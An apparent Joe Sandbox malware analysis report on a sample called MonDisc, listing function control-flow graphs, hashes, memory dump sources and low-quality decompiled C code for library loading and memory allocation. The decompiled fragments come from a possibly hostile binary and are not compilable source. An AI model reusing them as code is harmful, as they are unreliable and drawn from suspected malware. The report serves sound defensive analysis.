                              • API String ID: 146177575-0
                              • Opcode ID: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction ID: a29f918c35169a58e0984b62eca24ba4dc25f963b370f662b738bcafeeb3db39
                              • Opcode Fuzzy Hash: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction Fuzzy Hash: 2EC162A2D2C9438AFF006B34AD1A2B926E47F257B4F544B39D40AD26A7DF3CF1458613
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FA34C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 196windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6498 7ff62c8fa34c-7ff62c8fa36b call 7ff62c984484 6501 7ff62c8fa374-7ff62c8fa38b 6498->6501 6502 7ff62c8fa36d-7ff62c8fa372 6498->6502 6503 7ff62c8fa391-7ff62c8fa399 call 7ff62c984484 6501->6503 6502->6501 6506 7ff62c8fa3a2-7ff62c8fa3a7 6503->6506 6507 7ff62c8fa39b-7ff62c8fa3a0 6503->6507 6509 7ff62c8fa3aa 6506->6509 6507->6506 6510 7ff62c8fa3ad-7ff62c8fa3ca GetUserDefaultLangID 6509->6510 6510->6510 6511 7ff62c8fa3cc-7ff62c8fa3dd 6510->6511 6511->6509 6512 7ff62c8fa3df-7ff62c8fa415 call 7ff62c984484 6511->6512 6516 7ff62c8fa41e-7ff62c8fa451 call 7ff62c984484 6512->6516 6517 7ff62c8fa417-7ff62c8fa41c 6512->6517 6520 7ff62c8fa453-7ff62c8fa458 6516->6520 6521 7ff62c8fa45a-7ff62c8fa45d 6516->6521 6517->6516 6520->6521 6522 7ff62c8fa45f-7ff62c8fa463 6521->6522 6523 7ff62c8fa469-7ff62c8fa477 GetMessageExtraInfo call 7ff62c984484 6521->6523 6522->6503 6522->6523 6526 7ff62c8fa480-7ff62c8fa483 6523->6526 6527 7ff62c8fa479-7ff62c8fa47e 6523->6527 6528 7ff62c8fa549-7ff62c8fa557 AnyPopup call 7ff62c984484 6526->6528 6529 7ff62c8fa489-7ff62c8fa491 call 7ff62c984484 6526->6529 6527->6526 6534 7ff62c8fa560-7ff62c8fa56d call 7ff62c984484 6528->6534 6535 7ff62c8fa559-7ff62c8fa55e 6528->6535 6536 7ff62c8fa493-7ff62c8fa498 6529->6536 6537 7ff62c8fa49a-7ff62c8fa49d 6529->6537 6549 7ff62c8fa56f-7ff62c8fa574 6534->6549 6550 7ff62c8fa576-7ff62c8fa584 6534->6550 6535->6534 6536->6537 6539 7ff62c8fa4a3-7ff62c8fa4ab call 7ff62c984484 6537->6539 6540 7ff62c8fa59d-7ff62c8fa5a5 call 7ff62c984484 6537->6540 6551 7ff62c8fa4b4-7ff62c8fa4c8 6539->6551 6552 7ff62c8fa4ad-7ff62c8fa4b2 6539->6552 6547 7ff62c8fa5ae-7ff62c8fa5b1 6540->6547 6548 7ff62c8fa5a7-7ff62c8fa5ac 6540->6548 6553 7ff62c8fa5b3 6547->6553 6554 7ff62c8fa586-7ff62c8fa58a 6547->6554 6548->6547 6549->6550 6555 7ff62c8fa5c2-7ff62c8fa615 GetLargePageMinimum GetModuleHandleW call 7ff62c8f5f48 call 7ff62c8fe7c0 call 7ff62c8fb610 6550->6555 6556 7ff62c8fa4cc 6551->6556 6557 7ff62c8fa4ca 6551->6557 6552->6551 6553->6555 6558 7ff62c8fa50b-7ff62c8fa513 call 7ff62c984484 6553->6558 6554->6558 6560 7ff62c8fa590-7ff62c8fa597 6554->6560 6561 7ff62c8fa4cf-7ff62c8fa4d3 6556->6561 6557->6556 6557->6558 6569 7ff62c8fa515-7ff62c8fa51a 6558->6569 6570 7ff62c8fa51c-7ff62c8fa532 call 7ff62c984484 6558->6570 6560->6540 6564 7ff62c8fa4d5-7ff62c8fa4ea call 7ff62c984484 6561->6564 6565 7ff62c8fa503 6561->6565 6573 7ff62c8fa4f3-7ff62c8fa4ff 6564->6573 6574 7ff62c8fa4ec-7ff62c8fa4f1 6564->6574 6565->6558 6569->6570 6580 7ff62c8fa534-7ff62c8fa539 6570->6580 6581 7ff62c8fa53b-7ff62c8fa543 6570->6581 6573->6561 6577 7ff62c8fa501 6573->6577 6574->6573 6577->6561 6577->6565 6580->6581 6581->6528
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: DefaultExtraInfoLangMessageUser
                              • String ID: <
                              • API String ID: 3021954254-4251816714
                              • Opcode ID: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction ID: 087b3a54ed1d34837da6572d19a92faa152105025a53e25295fae01fa3735caf
                              • Opcode Fuzzy Hash: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction Fuzzy Hash: 7461AF57D685038AEF515F389C9A2FA59D43F293B4F948639D849C21A7EE3CF1898103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C900C60 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureExceptionRaiseRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 2358177407-0
                              • Opcode ID: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction ID: 02850991cc3d5dc36d953c0e9c5773ddb23191c0d570766eab3e868c25b50f8c
                              • Opcode Fuzzy Hash: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction Fuzzy Hash: 83314932A08B8182EF608F15F8443EAB361FB88790F485436DA8D43669EF3DE549CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FA3FB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6601 7ff62c8fa3fb-7ff62c8fa400 6602 7ff62c8fa402-7ff62c8fa405 6601->6602 6603 7ff62c8fa40d-7ff62c8fa415 call 7ff62c984484 6602->6603 6604 7ff62c8fa407-7ff62c8fa40b 6602->6604 6609 7ff62c8fa41e-7ff62c8fa451 call 7ff62c984484 6603->6609 6610 7ff62c8fa417-7ff62c8fa41c 6603->6610 6604->6603 6605 7ff62c8fa3e4-7ff62c8fa3f9 call 7ff62c984484 6604->6605 6605->6601 6605->6602 6614 7ff62c8fa453-7ff62c8fa458 6609->6614 6615 7ff62c8fa45a-7ff62c8fa45d 6609->6615 6610->6609 6614->6615 6616 7ff62c8fa45f-7ff62c8fa463 6615->6616 6617 7ff62c8fa469-7ff62c8fa477 GetMessageExtraInfo call 7ff62c984484 6615->6617 6616->6617 6618 7ff62c8fa391-7ff62c8fa399 call 7ff62c984484 6616->6618 6623 7ff62c8fa480-7ff62c8fa483 6617->6623 6624 7ff62c8fa479-7ff62c8fa47e 6617->6624 6627 7ff62c8fa3a2-7ff62c8fa3a7 6618->6627 6628 7ff62c8fa39b-7ff62c8fa3a0 6618->6628 6625 7ff62c8fa549-7ff62c8fa557 AnyPopup call 7ff62c984484 6623->6625 6626 7ff62c8fa489-7ff62c8fa491 call 7ff62c984484 6623->6626 6624->6623 6635 7ff62c8fa560-7ff62c8fa56d call 7ff62c984484 6625->6635 6636 7ff62c8fa559-7ff62c8fa55e 6625->6636 6638 7ff62c8fa493-7ff62c8fa498 6626->6638 6639 7ff62c8fa49a-7ff62c8fa49d 6626->6639 6634 7ff62c8fa3aa 6627->6634 6628->6627 6637 7ff62c8fa3ad-7ff62c8fa3ca GetUserDefaultLangID 6634->6637 6653 7ff62c8fa56f-7ff62c8fa574 6635->6653 6654 7ff62c8fa576-7ff62c8fa584 6635->6654 6636->6635 6637->6637 6640 7ff62c8fa3cc-7ff62c8fa3dd 6637->6640 6638->6639 6642 7ff62c8fa4a3-7ff62c8fa4ab call 7ff62c984484 6639->6642 6643 7ff62c8fa59d-7ff62c8fa5a5 call 7ff62c984484 6639->6643 6640->6634 6644 7ff62c8fa3df 6640->6644 6655 7ff62c8fa4b4-7ff62c8fa4c8 6642->6655 6656 7ff62c8fa4ad-7ff62c8fa4b2 6642->6656 6651 7ff62c8fa5ae-7ff62c8fa5b1 6643->6651 6652 7ff62c8fa5a7-7ff62c8fa5ac 6643->6652 6644->6603 6657 7ff62c8fa5b3 6651->6657 6658 7ff62c8fa586-7ff62c8fa58a 6651->6658 6652->6651 6653->6654 6659 7ff62c8fa5c2-7ff62c8fa5d9 GetLargePageMinimum GetModuleHandleW call 7ff62c8f5f48 6654->6659 6660 7ff62c8fa4cc 6655->6660 6661 7ff62c8fa4ca 6655->6661 6656->6655 6657->6659 6662 7ff62c8fa50b-7ff62c8fa513 call 7ff62c984484 6657->6662 6658->6662 6664 7ff62c8fa590-7ff62c8fa597 6658->6664 6667 7ff62c8fa5de-7ff62c8fa5ef call 7ff62c8fe7c0 6659->6667 6665 7ff62c8fa4cf-7ff62c8fa4d3 6660->6665 6661->6660 6661->6662 6673 7ff62c8fa515-7ff62c8fa51a 6662->6673 6674 7ff62c8fa51c-7ff62c8fa532 call 7ff62c984484 6662->6674 6664->6643 6668 7ff62c8fa4d5-7ff62c8fa4ea call 7ff62c984484 6665->6668 6669 7ff62c8fa503 6665->6669 6683 7ff62c8fa5f3-7ff62c8fa5f6 call 7ff62c8fb610 6667->6683 6677 7ff62c8fa4f3-7ff62c8fa4ff 6668->6677 6678 7ff62c8fa4ec-7ff62c8fa4f1 6668->6678 6669->6662 6673->6674 6684 7ff62c8fa534-7ff62c8fa539 6674->6684 6685 7ff62c8fa53b-7ff62c8fa543 6674->6685 6677->6665 6681 7ff62c8fa501 6677->6681 6678->6677 6681->6665 6681->6669 6688 7ff62c8fa5fb-7ff62c8fa615 6683->6688 6684->6685 6685->6625
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExtraHandleInfoLargeMessageMinimumModulePagePopup
                              • String ID: <
                              • API String ID: 2008092851-4251816714
                              • Opcode ID: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction ID: 8d23a95a2b9b932e6a4cc62c2c0218142066baec86900b377243b1e269e8e6cf
                              • Opcode Fuzzy Hash: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction Fuzzy Hash: C251BF57D689034AFF555B349CAA2FA59C43F293B4F948A39D949C22A3DE3CF1894103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C912172 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 17libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6689 7ff62c912172-7ff62c91218a LoadLibraryExA 6690 7ff62c91221b-7ff62c912222 6689->6690 6691 7ff62c912190-7ff62c9121aa GetProcAddress 6689->6691 6691->6690
                              C-Code - Quality: 21%
                              			E00007FF67FF62C912172(long long __rax, long long* __rbx) {
				void* _t15;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				void* _t42;

				 *(_t42 + 0x37) =  *(_t42 + 0x37) << 0x45;
				LoadLibraryExA(??, ??, ??); // executed
				if (__rax == 0) goto 0x2c91221b;
				GetProcAddress(??, ??); // executed
				 *0x2ca36f70 = __rax;
				if (__rax == 0) goto 0x2c91221b;
				if ( *((long long*)(__rax))() == 0) goto 0x2c91221b;
				_t27 =  *((intOrPtr*)(__rbx));
				if (_t27 - 2 >= 0) goto 0x2c9121ca;
				 *__rbx = _t27 + 2;
				_t29 =  *((intOrPtr*)(__rbx + 8));
				if (_t29 - 0x40 >= 0) goto 0x2c9121dc;
				 *((long long*)(__rbx + 8)) = _t29 + 0x40;
				_t31 =  *((intOrPtr*)(__rbx + 0x10));
				if (_t31 - 0x200 >= 0) goto 0x2c9121f2;
				 *((long long*)(__rbx + 0x10)) = _t31 + 0x200;
				_t33 =  *((intOrPtr*)(__rbx + 0x18));
				if (_t33 - 0x20000 >= 0) goto 0x2c912208;
				 *((long long*)(__rbx + 0x18)) = _t33 + 0x20000;
				E00007FF67FF62C912230(_t12, _t15, __rbx);
				return 1;
			}









                              0x7ff62c912172
                              0x7ff62c912181
                              0x7ff62c91218a
                              0x7ff62c91219a
                              0x7ff62c9121a0
                              0x7ff62c9121aa
                              0x7ff62c9121b8
                              0x7ff62c9121ba
                              0x7ff62c9121c1
                              0x7ff62c9121c7
                              0x7ff62c9121ca
                              0x7ff62c9121d2
                              0x7ff62c9121d8
                              0x7ff62c9121dc
                              0x7ff62c9121e6
                              0x7ff62c9121ee
                              0x7ff62c9121f2
                              0x7ff62c9121fc
                              0x7ff62c912204
                              0x7ff62c91220b
                              0x7ff62c91221a

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: E$SystemFunction036$advapi32.dll
                              • API String ID: 2574300362-2157769833
                              • Opcode ID: 784dea273f4089e33f14c0455f5d1bb132508375cdcb4c3a2b6d1edbc26e4bb3
                              • Instruction ID: 7c490b1ad07591223fcd75cd5f40cbbfab85c7eea5e6f1caf26b8345108a7caf
                              • Opcode Fuzzy Hash: 784dea273f4089e33f14c0455f5d1bb132508375cdcb4c3a2b6d1edbc26e4bb3
                              • Instruction Fuzzy Hash: BFE04661E0AB8292FF498B24BC402B522E4BF48361B880835C50EC2396FF7CE0898302
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C914230 Relevance: 7.7, APIs: 6, Instructions: 155memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6692 7ff62c914230-7ff62c914265 6693 7ff62c91426b-7ff62c91427c 6692->6693 6694 7ff62c9142fd-7ff62c91430e 6692->6694 6693->6694 6697 7ff62c91427e-7ff62c9142b4 GetLastError VirtualAlloc SetLastError 6693->6697 6695 7ff62c91445b 6694->6695 6696 7ff62c914314-7ff62c914349 GetLastError VirtualAlloc SetLastError 6694->6696 6699 7ff62c91445d-7ff62c91447b 6695->6699 6696->6695 6698 7ff62c91434f-7ff62c91435c 6696->6698 6697->6694 6700 7ff62c9142b6-7ff62c9142bc 6697->6700 6701 7ff62c914362-7ff62c914366 6698->6701 6702 7ff62c914404-7ff62c91440d call 7ff62c913f80 6698->6702 6703 7ff62c9142be-7ff62c9142c1 6700->6703 6704 7ff62c9142c3-7ff62c9142c6 6700->6704 6706 7ff62c914370-7ff62c91437e 6701->6706 6708 7ff62c914412-7ff62c914419 6702->6708 6707 7ff62c9142c9-7ff62c9142f7 6703->6707 6704->6707 6709 7ff62c91438b-7ff62c914392 6706->6709 6710 7ff62c914380-7ff62c914387 6706->6710 6707->6694 6707->6699 6708->6695 6711 7ff62c91441b-7ff62c914442 6708->6711 6713 7ff62c9143ea-7ff62c9143ed 6709->6713 6714 7ff62c914394-7ff62c914397 6709->6714 6710->6706 6712 7ff62c914389 6710->6712 6711->6699 6715 7ff62c9143ef 6712->6715 6713->6702 6713->6715 6714->6713 6716 7ff62c914399-7ff62c9143b2 6714->6716 6719 7ff62c9143f3-7ff62c9143f9 6715->6719 6717 7ff62c9143be-7ff62c9143e8 6716->6717 6718 7ff62c9143b4-7ff62c9143ba 6716->6718 6717->6708 6718->6717 6720 7ff62c9143fb-7ff62c914402 6719->6720 6721 7ff62c914444-7ff62c914459 call 7ff62c915690 6719->6721 6720->6702 6720->6719 6721->6699
                              C-Code - Quality: 51%
                              			E00007FF67FF62C914230(void* __rax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
				long _t51;
				signed int _t52;
				void* _t54;
				void* _t75;
				void* _t87;
				intOrPtr* _t88;
				signed long long _t92;
				long long _t94;
				long long* _t95;
				void* _t98;
				intOrPtr* _t104;
				intOrPtr _t105;
				long long _t107;
				intOrPtr _t110;
				void* _t115;
				signed long long _t118;
				signed long long _t120;
				signed long long _t121;
				long long _t129;
				void* _t133;
				intOrPtr _t136;
				intOrPtr _t139;
				intOrPtr _t141;
				long _t142;
				long _t146;
				signed long long _t147;
				void* _t149;
				signed long long _t151;
				void* _t152;
				signed long long _t154;

				 *((long long*)(_t133 + 8)) = __rbx;
				 *((long long*)(_t133 + 0x10)) = _t129;
				 *((long long*)(_t133 + 0x18)) = __rsi;
				 *((long long*)(_t133 + 0x20)) = __rdi;
				r14d = 0;
				if (__rdx - 0x20000 < 0) goto 0x2c9142fd;
				_t151 = __rdx + 0x00020036 & 0xfffe0000;
				if (_t151 - __rdx <= 0) goto 0x2c9142fd;
				GetLastError();
				r9d = 4;
				r8d = 0x103000;
				VirtualAlloc(_t149, _t146);
				SetLastError(_t142);
				_t102 =  !=  ? __rax : 0xffffffff;
				if (0xffffffff == 0xffffffff) goto 0x2c9142fd;
				if (0xffffffff != 0xffffffff) goto 0x2c9142c3;
				goto 0x2c9142c9;
				_t103 = ( !=  ? __rax : 0xffffffff) + 0xffffffff;
				_t152 = _t151 - 0xffffffff;
				 *0xffffffff = 0xbadbad;
				 *0x00000007 = _t152 - 0x00000020 | 0x00000002;
				_t9 = _t103 + 0x10; // 0x10000000f
				_t87 = _t9;
				 *((long long*)(0xffffffff + _t152 - 0x18)) = 0xb;
				 *(( !=  ? __rax : 0xffffffff) + 0xffffffff + _t152 - 0x10) = _t146;
				if (_t87 != 0) goto 0x2c91445d;
				_t154 = __rdx + 0x00020040 & 0xfffe0000;
				if (_t154 - __rdx <= 0) goto 0x2c91445b;
				_t51 = GetLastError();
				r9d = 4;
				r8d = 0x3000;
				_t52 = VirtualAlloc(??, ??, ??, ??); // executed
				_t98 = _t87;
				SetLastError(??);
				_t144 =  !=  ? _t98 : 0xffffffff;
				if (0xffffffff == 0xffffffff) goto 0x2c91445b;
				_t88 = __rcx + 0x348;
				_t104 = _t88;
				if (_t88 == 0) goto 0x2c914404;
				asm("o16 nop [eax+eax]");
				_t139 =  *((intOrPtr*)(_t104 + 8));
				_t136 =  *_t104;
				_t115 = _t136 + _t139;
				if (0xffffffff == _t115) goto 0x2c91438b;
				_t105 =  *((intOrPtr*)(_t104 + 0x10));
				if (_t105 != 0) goto 0x2c914370;
				goto 0x2c9143ef;
				_t141 =  *((intOrPtr*)(__rcx + 0x20));
				if (_t141 - _t136 < 0) goto 0x2c9143ea;
				_t75 = _t141 - _t115;
				if (_t75 >= 0) goto 0x2c9143ea;
				 *((long long*)(_t105 + 8)) = _t139 + _t154;
				if (_t75 == 0) goto 0x2c9143be;
				r14d = _t52 & 0x00000007;
				_t147 =  ~_t146;
				r14d = r14d & 0x00000007;
				_t118 =  *(__rcx + 0x10) + _t154 - _t147;
				_t107 =  *((intOrPtr*)(__rcx + 0x20)) + _t147;
				 *((long long*)(__rcx + 0x20)) = _t107;
				 *(__rcx + 0x10) = _t118;
				_t92 = _t118 | 0x00000001;
				 *(_t107 + 8) = _t92;
				 *((long long*)(_t107 + _t118 + 8)) = 0x40;
				 *((long long*)(__rcx + 0x28)) = 0x200000;
				goto 0x2c914412;
				if (_t92 == 0) goto 0x2c914404;
				if ( *_t92 == 0xffffffff + _t154) goto 0x2c914444;
				if ( *((intOrPtr*)(_t92 + 0x10)) != 0) goto 0x2c9143f3;
				_t54 = E00007FF67FF62C913F80(_t52 & 0x00000007, _t51, _t98, __rcx, 0xffffffff, __rdi, __rcx, __rdx, _t154);
				_t120 =  *(__rcx + 0x10);
				if (__rdx - _t120 >= 0) goto 0x2c91445b;
				_t110 =  *((intOrPtr*)(__rcx + 0x20));
				_t121 = _t120 - __rdx;
				 *(__rcx + 0x10) = _t121;
				_t94 = _t110 + __rdx;
				 *((long long*)(__rcx + 0x20)) = _t94;
				 *(_t94 + 8) = _t121 | 0x00000001;
				_t95 = _t110 + 0x10;
				 *(_t110 + 8) = __rdx | 0x00000003;
				goto 0x2c91445d;
				 *((intOrPtr*)(_t95 + 8)) =  *((intOrPtr*)(_t95 + 8)) + _t154;
				 *_t95 =  !=  ? _t98 : 0xffffffff;
				E00007FF67FF62C915690(_t54, __rdx - _t120, __rcx, 0xffffffff, _t154, __rdx | 0x00000003);
				goto 0x2c91445d;
				return 0;
			}

































                              0x7ff62c914230
                              0x7ff62c914235
                              0x7ff62c91423a
                              0x7ff62c91423f
                              0x7ff62c91424e
                              0x7ff62c914265
                              0x7ff62c914272
                              0x7ff62c91427c
                              0x7ff62c91427e
                              0x7ff62c914284
                              0x7ff62c914289
                              0x7ff62c914296
                              0x7ff62c9142a1
                              0x7ff62c9142ad
                              0x7ff62c9142b4
                              0x7ff62c9142bc
                              0x7ff62c9142c1
                              0x7ff62c9142c9
                              0x7ff62c9142cc
                              0x7ff62c9142d3
                              0x7ff62c9142de
                              0x7ff62c9142e2
                              0x7ff62c9142e2
                              0x7ff62c9142e6
                              0x7ff62c9142ef
                              0x7ff62c9142f7
                              0x7ff62c914304
                              0x7ff62c91430e
                              0x7ff62c914314
                              0x7ff62c91431a
                              0x7ff62c914320
                              0x7ff62c91432d
                              0x7ff62c914335
                              0x7ff62c914338
                              0x7ff62c914341
                              0x7ff62c914349
                              0x7ff62c91434f
                              0x7ff62c914356
                              0x7ff62c91435c
                              0x7ff62c914366
                              0x7ff62c914370
                              0x7ff62c914374
                              0x7ff62c914377
                              0x7ff62c91437e
                              0x7ff62c914380
                              0x7ff62c914387
                              0x7ff62c914389
                              0x7ff62c91438b
                              0x7ff62c914392
                              0x7ff62c914394
                              0x7ff62c914397
                              0x7ff62c91439d
                              0x7ff62c9143b2
                              0x7ff62c9143b4
                              0x7ff62c9143b7
                              0x7ff62c9143ba
                              0x7ff62c9143be
                              0x7ff62c9143c1
                              0x7ff62c9143c4
                              0x7ff62c9143cb
                              0x7ff62c9143cf
                              0x7ff62c9143d3
                              0x7ff62c9143d7
                              0x7ff62c9143e0
                              0x7ff62c9143e8
                              0x7ff62c9143ed
                              0x7ff62c9143f9
                              0x7ff62c914402
                              0x7ff62c91440d
                              0x7ff62c914412
                              0x7ff62c914419
                              0x7ff62c91441b
                              0x7ff62c91441f
                              0x7ff62c914422
                              0x7ff62c91442a
                              0x7ff62c914432
                              0x7ff62c914436
                              0x7ff62c91443a
                              0x7ff62c91443e
                              0x7ff62c914442
                              0x7ff62c914444
                              0x7ff62c91444e
                              0x7ff62c914454
                              0x7ff62c914459
                              0x7ff62c91447b

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction ID: 11ca606a2b89079650a6a545d82144bd12ba7e94f9946d88472e9e1ee43a09ca
                              • Opcode Fuzzy Hash: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction Fuzzy Hash: AB51B372B09B8182EE24CB19E84537972A8FB49BA4F584A35CA6E877D1DF7CD442C301
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B4F0 Relevance: 6.1, APIs: 4, Instructions: 80memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
